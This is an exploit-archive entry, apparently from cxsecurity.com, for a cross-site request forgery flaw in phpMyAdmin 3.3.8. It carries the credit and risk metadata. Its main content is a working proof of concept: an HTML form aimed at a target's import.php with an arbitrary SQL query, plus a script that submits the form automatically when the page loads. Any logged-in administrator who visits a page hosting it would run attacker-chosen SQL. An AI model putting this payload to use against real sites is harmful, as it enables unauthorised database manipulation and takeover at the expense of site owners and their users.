phpMyAdmin 3.3.8 CSRF sql code execution

2010.12.19
Credit: Gabry9191
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

<!-- _ ___ _ __ | |_ _ __ _ / __| '_ \| | | | |/ _` | \__ \ |_) | | |_| | (_| | |___/ .__/|_|\__,_|\__,_| |_| [+] Exploit Title : [0-day]phpMyAdmin 3.3.8 CSRF sql code execution [+] Software Link: http://www.phpmyadmin.net/home_page/downloads.php [+] Tested on: phpMyAdmin 3.3.8 [~] Authors : Gabry9191 - Foth - Vaghy -> Splua Hack Crew [~] Bug hunted by : Gabry9191 [~] Date : 4/11/2010 --> <form name="sqlform" id="sqlqueryform" enctype="multipart/form-data" action="https://[WEBSITE]/[phpMyAdmin Directory]/import.php" method="post"> <textarea rows="0" cols="0" id="sqlquery" name="sql_query"> Sql Code To Injecting </textarea> <input type="submit" value="Esegui" name="SQL"> </form> <script>document.body.onload = document.forms[0].submit();</script>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top